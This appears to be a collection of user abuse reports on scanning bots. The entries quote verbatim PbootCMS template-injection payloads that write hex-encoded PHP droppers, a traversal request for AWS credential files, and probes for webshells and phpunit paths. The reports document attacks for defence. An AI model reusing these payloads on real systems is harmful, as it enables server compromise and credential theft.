Searching for vulnerabilities: ?p=6&test=%7D%7Bpboot%3Aif%28%28%22var_%22.%22dump%22%29%28%28%22file ...
show moreSearching for vulnerabilities: ?p=6&test=%7D%7Bpboot%3Aif%28%28%22var_%22.%22dump%22%29%28%28%22file%22.%22_put_contents%22%29%28%22.%2Fll.php%22%2C%28%22hex2bi%22.%22n%22%29%28%22796f75626f79706f6f6c383838383c3f706870207661725f64756d7028636f707928245f4745545b315d2c245f4745545b325d29293b3f3e%22%29%29%29%29%7D%7B%2Fpboot%3Aif%7D
show less
Blocked by firewall for Directory Traversal in query string: file_name=..%2F..%2F..%2F..%2F..%2F..%2 ...
show moreBlocked by firewall for Directory Traversal in query string: file_name=..%2F..%2F..%2F..%2F..%2F..%2F~%2F.aws%2Fcredentials
show less
Scans the website for files like "GET /%5BR=404,L%5D/up.php HTTP/1.1", "GET //wp-content/plugins/fix ...
show moreScans the website for files like "GET /%5BR=404,L%5D/up.php HTTP/1.1", "GET //wp-content/plugins/fix/up.php HTTP/1.1", etc
show less
Requests various non-existing files, eg. x.php, function.php, s.php, about.php, cjfuns.php, /mah/fun ...
show moreRequests various non-existing files, eg. x.php, function.php, s.php, about.php, cjfuns.php, /mah/function.php, /index/function.php, /index.php/function.php, /autoload_classmap.php, bugz.php, /%5bR=404,L%5d, shell.php and many others. It alternates IPs
show less
Requests various non-existing files, eg. x.php, function.php, s.php, about.php, cjfuns.php, /mah/fun ...
show moreRequests various non-existing files, eg. x.php, function.php, s.php, about.php, cjfuns.php, /mah/function.php, /index/function.php, /index.php/function.php, /autoload_classmap.php, bugz.php, /%5bR=404,L%5d, shell.php and many others. It alternates IPs
show less
Requests various non-existing files, eg. x.php, function.php, s.php, about.php, cjfuns.php, /mah/fun ...
show moreRequests various non-existing files, eg. x.php, function.php, s.php, about.php, cjfuns.php, /mah/function.php, /index/function.php, /index.php/function.php, /autoload_classmap.php, bugz.php, /%5bR=404,L%5d, shell.php and many others. It alternates IPs
show less
Always looking for non existent pbootcms: "GET /?p=13&test=}{pboot:if((\"var_\".\"dump\")((\"file\". ...
show moreAlways looking for non existent pbootcms: "GET /?p=13&test=}{pboot:if((\"var_\".\"dump\")((\"file\".\"_put_contents\")(\"./runtime/cache/ll.php\",(\"hex2bi\".\"n\")(\"796f75626f79706f6f6c383838383c3f706870207661725f64756d7028636f707928245f4745545b315d2c245f4745545b325d29293b3f3e\"))))}{/pboot:if}
show less
Attempt to inject "GET /?p=1&test=}{pboot:if((\"var_\".\"dump\")((\"file\".\"_put_contents\")(\"./ru ...
show moreAttempt to inject "GET /?p=1&test=}{pboot:if((\"var_\".\"dump\")((\"file\".\"_put_contents\")(\"./runtime/cache/ll.php\",(\"hex2bi\".\"n\")(\"796f75626f79706f6f6c383838383c3f706870207661725f64756d7028636f707928245f4745545b315d2c245f4745545b325d29293b3f3e\"))))}{/pboot:if} HTTP/1.1" 503 18035 ". Probably related to pbootcms vulnerability
show less
This is the first IP of a bot performing a strange pattern: it requests /vendor/phpunit/phpunit/LICE ...
show moreThis is the first IP of a bot performing a strange pattern: it requests /vendor/phpunit/phpunit/LICENSE, it changes IP (5.255.168.152) and requests the same file, it changes IP (173.52.67.207) and requests the same file again, it changes IP (34.174.87.119) and requests /vendor/phpunit/phpunit/src/Util/PHP/, it changes IP (178.34.151.211) and requests the same file, it changes IP (209.112.86.202) and requests again the same file, it changes IP (116.102.156.19). Finally, three different IPs request wp-login.php (190.13.12.190, 172.98.32.179,
46.210.255.100). They're all GET requests with user agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36". I wouldn't even say this is "Web app attack"
show less
Apparently, it checks in the wrong place a vulnerability for the pbootcms -> "GET /?p=1&test=}{pboot ...
show moreApparently, it checks in the wrong place a vulnerability for the pbootcms -> "GET /?p=1&test=}{pboot:if((\"var_\".\"dump\")((\"file\".\"_put_contents\")(\"./runtime/cache/login2.php/\",(\"hex2bi\".\"n\")(\"3c3f70687020244f30304f4f303d75726c6465636f6465282225373825333425363325364625324625373025333925373925373125364525363425324425364325373225364225363425363725354625363525363825363325373325373725364625324225363625333325333725364125363625363925364325363525363625363425363625363425373325373025373525373425363425363625363425363325364625364525363425373325373425363525364525364425373125373625373522293b244f30304f304f3d244f30304f4f305b34345d2e244f30304f4f305b32335d2e244f30304f4f305b33385d2e244f30304f4...
show less
With the same user agent string (this old Chrome version: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) ...
show moreWith the same user agent string (this old Chrome version: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36) in 10 seconds it requests /vendor/phpunit/phpunit/LICENSE, /vendor/phpunit/phpunit/src/Util/PHP, then tries to access wp-login.php. Meanwhile, it changes its IP 9 times, every request comes from a different IP: 149.200.147.128, 80.45.214.248, 172.9.94.53, 46.251.134.219, 157.100.53.80, 89.169.48.41, 178.218.103.140, 73.115.239.134, 176.107.98.76 (no IP is recorded by AbuseIPDB)
show less